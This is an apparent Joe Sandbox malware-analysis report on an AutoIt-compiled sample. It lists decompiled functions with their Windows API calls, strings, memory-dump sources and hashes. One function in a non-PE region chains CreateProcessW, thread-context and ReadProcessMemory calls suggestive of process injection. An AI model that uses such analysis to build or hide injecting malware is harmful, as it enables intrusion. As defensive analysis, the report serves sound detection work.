Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: a334791cabc0196f3bb097d48a37451095e9465e213e6379f2884842ec92fc81
Instruction ID: ea0570ff442a880d0978624d90551eb9ce09a6bac9a588a92dbfcf7aefd67c58
Opcode Fuzzy Hash: a334791cabc0196f3bb097d48a37451095e9465e213e6379f2884842ec92fc81
Instruction Fuzzy Hash: DC917E71914229AFCF06EFA4CC81AEDB7B8FF04314B14452EE815EB2A1DB74AD45CB90

Function 003935B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,003935A1,SwapMouseButtons,00000004,?), ref: 003935D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,003935A1,SwapMouseButtons,00000004,?,?,?,?,00392754), ref: 003935F5
RegCloseKey.KERNELBASE(00000000,?,?,003935A1,SwapMouseButtons,00000004,?,?,?,?,00392754), ref: 00393617

Strings

Control Panel\Mouse, xrefs: 003935D2

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 5c3bb579e18ca60705394e028a0eab3232e8d3586e67e3fa7d8db75a2b90d56e
Instruction ID: c174bf8875e05727d1d1f928d56d6f13fca1fbc44575cbdcd0607b21129ccda1
Opcode Fuzzy Hash: 5c3bb579e18ca60705394e028a0eab3232e8d3586e67e3fa7d8db75a2b90d56e
Instruction Fuzzy Hash: 201133B1614208BADF228FA8D880AEBBBA8EF04740F018469E805D7210E2719E459BA4

Function 01316CD0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0131748B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01317521
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01317543

Memory Dump Source

Source File: 00000000.00000002.1394800227.0000000001315000.00000040.00000020.00020000.00000000.sdmp, Offset: 01315000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1315000_5by4QM3v89.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 3790e136272a110f5ab4d8617909c812004bdd41f4683ed991f3cafb80161bff
Instruction ID: 928d03d2d3a131514a16a817bb6a5971d5d8583c27a7fa468c7a481a76d14b98
Opcode Fuzzy Hash: 3790e136272a110f5ab4d8617909c812004bdd41f4683ed991f3cafb80161bff
Instruction Fuzzy Hash: AD623C30A14258DBEB24CFA4C840BEEB776EF58304F1091A9D20DEB394E7759E81CB59

Function 003F955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00394EE5: _fseek.LIBCMT ref: 00394EFD

Part of subcall function 003F9734: _wcscmp.LIBCMT ref: 003F9824
Part of subcall function 003F9734: _wcscmp.LIBCMT ref: 003F9837

_free.LIBCMT ref: 003F96A2
_free.LIBCMT ref: 003F96A9
_free.LIBCMT ref: 003F9714

Part of subcall function 003B2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,003B9A24), ref: 003B2D69
Part of subcall function 003B2D55: GetLastError.KERNEL32(00000000,?,003B9A24), ref: 003B2D7B

_free.LIBCMT ref: 003F971C

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 57d0d2f04a8deae04fb8388104c663c78e861137db03f429770e89b5c3a69279
Instruction ID: 99557f0ea5890910b91b19a3b91b2a27c96d4de0a46e65b5d003f02ba491ef2b
Opcode Fuzzy Hash: 57d0d2f04a8deae04fb8388104c663c78e861137db03f429770e89b5c3a69279
Instruction Fuzzy Hash: 1F5161B1D14218AFDF259F64CC81BAEBBB9EF48304F10059EF209A7251DB715A81CF58

Function 003B470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003B47A0
__flush.LIBCMT ref: 003B47C0
__write.LIBCMT ref: 003B47F3
__flsbuf.LIBCMT ref: 003B4821

Part of subcall function 003B8B28: __getptd_noexit.LIBCMT ref: 003B8B28

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: b2f0b7c145cee66cdc440e634ef7d1a939420357d88debe5041493b8e86a8c35
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 6D41F934B007459BDB1ACF69C8819EE77A5EF41358B10813DE665C7E42EB31DD41CB48

Function 003944A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003944CF

Part of subcall function 0039407C: _memset.LIBCMT ref: 003940FC
Part of subcall function 0039407C: _wcscpy.LIBCMT ref: 00394150
Part of subcall function 0039407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00394160

KillTimer.USER32(?,00000001,?,?), ref: 00394524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00394533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003CD4B9

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: d8089464de548547d5fa740cfdc9d263ca8c7f6fbe28cfc0d09ab0fd1fe3eedd
Instruction ID: 3327a86c1e2f7a49431562c44b87e8da24e71cff3a9d861494e1fab58f00b153
Opcode Fuzzy Hash: d8089464de548547d5fa740cfdc9d263ca8c7f6fbe28cfc0d09ab0fd1fe3eedd
Instruction Fuzzy Hash: 7721F5705047849FEB338B649855FE6BBEC9B02304F0400ADF79E96182C7746D85CB45

Function 00394C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00394CBA

Strings

AU3!P/B, xrefs: 00394CB4
EA06, xrefs: 003CD8CC

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/B$EA06
API String ID: 4104443479-416847823
Opcode ID: d5c7ff36a4ce7ce6fedecba81b1ca77fc8433dc8dbf056eb88eef1ade08c5dc7
Instruction ID: 116ce91a25f885231a3abbd84ec39432a80ecb13d7ec474d2b89d3f699ee39a1
Opcode Fuzzy Hash: d5c7ff36a4ce7ce6fedecba81b1ca77fc8433dc8dbf056eb88eef1ade08c5dc7
Instruction Fuzzy Hash: FF418B36A042586BDF279B648861FBF7FB6DB45300F284475FC82DF283D6209D4687A1

Function 00397285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003CEA39
GetOpenFileNameW.COMDLG32(?), ref: 003CEA83

Part of subcall function 00394750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00394743,?,?,003937AE,?), ref: 00394770

Part of subcall function 003B0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003B07B0

Strings

X, xrefs: 003CEA51

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 7dfa803190601eb8281442fe156789fc0e2208086be3e3e2c2f7e8bc1347f953
Instruction ID: dd50fe46fbaab129f946965f5fa453828dfbbfca4ad946ecdba144b2969c5309
Opcode Fuzzy Hash: 7dfa803190601eb8281442fe156789fc0e2208086be3e3e2c2f7e8bc1347f953
Instruction Fuzzy Hash: 4721C331A102489FDF02DF94C845BEE7BF8AF49714F00805AE548EB281DBB459898FA1

Function 003F98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 003F98F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 003F990F

Strings

aut, xrefs: 003F9909

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: bcccf775941b89df96c89e72af3ef50779b7a97bf3256913accafa2b939b30c8
Instruction ID: 8c61c743f8c6c917a22caf0afccf41eab18865fda0406b21b091addd2152aec2
Opcode Fuzzy Hash: bcccf775941b89df96c89e72af3ef50779b7a97bf3256913accafa2b939b30c8
Instruction Fuzzy Hash: 70D05E7954030DABDB50ABA0DC0EFDA777CE704700F0042F1BA54920A1EAB5A5998B99

Function 0040CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cf3799bebf1cfb0ab154d538136b232bd7b7c9936c8efafb64ea0e5c2869938
Instruction ID: 26f4fc6ec150895645cd089b49fb1772e27e1ee2f8e433585a67ae3e500db79e
Opcode Fuzzy Hash: 5cf3799bebf1cfb0ab154d538136b232bd7b7c9936c8efafb64ea0e5c2869938
Instruction Fuzzy Hash: 26F11471608301DFCB14DF29C480A6ABBE5BF89314F148A2EF8999B391D734E945CF86

Function 0039434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00394370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00394415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00394432

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 6898139f7bbd80a785e3d487a9791110a5a31b63b42ac02ca582208449b4b139
Instruction ID: 69ebc998692d0849201b7d6573bdb7f1806ea5c4bec3fd50e3f876b0db543038
Opcode Fuzzy Hash: 6898139f7bbd80a785e3d487a9791110a5a31b63b42ac02ca582208449b4b139
Instruction Fuzzy Hash: F43191B0504701DFDB22DF34D884AABBBF8FB58309F00093EF69A86251E770A945CB56

Function 003B571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 003B5733

Part of subcall function 003BA16B: __NMSG_WRITE.LIBCMT ref: 003BA192
Part of subcall function 003BA16B: __NMSG_WRITE.LIBCMT ref: 003BA19C

__NMSG_WRITE.LIBCMT ref: 003B573A

Part of subcall function 003BA1C8: GetModuleFileNameW.KERNEL32(00000000,004533BA,00000104,?,00000001,00000000), ref: 003BA25A
Part of subcall function 003BA1C8: ___crtMessageBoxW.LIBCMT ref: 003BA308

Part of subcall function 003B309F: ___crtCorExitProcess.LIBCMT ref: 003B30A5
Part of subcall function 003B309F: ExitProcess.KERNEL32 ref: 003B30AE

Part of subcall function 003B8B28: __getptd_noexit.LIBCMT ref: 003B8B28

RtlAllocateHeap.NTDLL(012D0000,00000000,00000001,00000000,?,?,?,003B0DD3,?), ref: 003B575F

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 77a954a81b0c30d5b21dbfa849476c5e8a211b02ef55b903be144ad5b0302d18
Instruction ID: 2334360cdcf8868cded56e29adb6697e26f865b82165c1522278b45e69ea1ef2
Opcode Fuzzy Hash: 77a954a81b0c30d5b21dbfa849476c5e8a211b02ef55b903be144ad5b0302d18
Instruction Fuzzy Hash: 4901CC75700B11EAD6136B79AC83BEE778C8B8236AF110535F7099E982DEB0D8008664

Function 003F98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,003F9548,?,?,?,?,?,00000004), ref: 003F98BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,003F9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 003F98D1
CloseHandle.KERNEL32(00000000,?,003F9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003F98D8

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: ee08c11b1e57696803210091c82f390f39e64f53e6a255d8728545993fd5c749
Instruction ID: cc06500fd336c2be8e550f338a0ed2a8221c75c9cab7eb4d43fe0203001537d5
Opcode Fuzzy Hash: ee08c11b1e57696803210091c82f390f39e64f53e6a255d8728545993fd5c749
Instruction Fuzzy Hash: E9E08632180618B7D7221B54EC09FDA7B19AB06760F108231FB24690E0C7B12916979C

Function 0039A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 003CFC01

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 29e1cf0c932a59f9ea6d8f262291fd74b12bb258c30b137d68b1fe05987b7b40
Instruction ID: 93c127d8b6997129bb30ecc819aa159ba729cd4ba15cd60763785d434c93db00
Opcode Fuzzy Hash: 29e1cf0c932a59f9ea6d8f262291fd74b12bb258c30b137d68b1fe05987b7b40
Instruction Fuzzy Hash: 3B225770508600DFDB2ADF14C494B6AB7E1FF85304F158A6EE88A8B762D731EC45CB82

Function 003F77B3 Relevance: 3.1, APIs: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003F78DB

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: e08e5740376f1f097e20cc84181f664d20e37d1f8c8171cd06e336dfcd3a4d45
Instruction ID: 61ed4139bcc615ac9cd745d5b3d5cd18db119d55a8ca79ae7a22a72499414ca5
Opcode Fuzzy Hash: e08e5740376f1f097e20cc84181f664d20e37d1f8c8171cd06e336dfcd3a4d45
Instruction Fuzzy Hash: F541D27190820D9FCB16EFA8D8869BAB7E8EF09344B24445DE3859B782DB75EC01C760

Function 00397A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00397AAB
_memmove.LIBCMT ref: 00397B16

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
Instruction ID: a626b4a1255879f22386485809f9f95be78b5b5ae274c5178a30be6846d4de3f
Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
Instruction Fuzzy Hash: 753184B1714606AFCB05DF68C8D1E69B3A9FF483207158629E519CB7D1EB30ED50CB90

Function 003947D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00394834

Part of subcall function 003B336C: __lock.LIBCMT ref: 003B3372
Part of subcall function 003B336C: DecodePointer.KERNEL32(00000001,?,00394849,003E7C74), ref: 003B337E
Part of subcall function 003B336C: EncodePointer.KERNEL32(?,?,00394849,003E7C74), ref: 003B3389

Part of subcall function 003948FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00394915
Part of subcall function 003948FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0039492A

Part of subcall function 00393B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00393B68
Part of subcall function 00393B3A: IsDebuggerPresent.KERNEL32 ref: 00393B7A
Part of subcall function 00393B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004552F8,004552E0,?,?), ref: 00393BEB
Part of subcall function 00393B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00393C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00394874

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 0397a2344e12d41e611119ad1e55ff2e32169a1460cd43c7f93c218691187b40
Instruction ID: b1eed0d50b8bfcd2f43e6eb9012d8421b62c4f5b6232a97c05c83d39e6c0c223
Opcode Fuzzy Hash: 0397a2344e12d41e611119ad1e55ff2e32169a1460cd43c7f93c218691187b40
Instruction Fuzzy Hash: 7E119D719183519BCB01EF29D80595EBBE8EF85750F10452EF044872B2DBB1D949CB9A

Function 003B0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003B571C: __FF_MSGBANNER.LIBCMT ref: 003B5733
Part of subcall function 003B571C: __NMSG_WRITE.LIBCMT ref: 003B573A
Part of subcall function 003B571C: RtlAllocateHeap.NTDLL(012D0000,00000000,00000001,00000000,?,?,?,003B0DD3,?), ref: 003B575F

std::exception::exception.LIBCMT ref: 003B0DEC
__CxxThrowException@8.LIBCMT ref: 003B0E01

Part of subcall function 003B859B: RaiseException.KERNEL32(?,?,?,00449E78,00000000,?,?,?,?,003B0E06,?,00449E78,?,00000001), ref: 003B85F0

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 13e99d6a0478a05cb65cdfb9250f107c7fa3b88fb89b10bcfa2f9967da269474
Instruction ID: acb21f7a316579e756253bf194a267bdef03fe48b327680e006ccdd000f750af
Opcode Fuzzy Hash: 13e99d6a0478a05cb65cdfb9250f107c7fa3b88fb89b10bcfa2f9967da269474
Instruction Fuzzy Hash: 66F0F431A0022D76CB16AB94EC01ADF77AC9F01358F50442AFA089A981DFB09A80C2D9

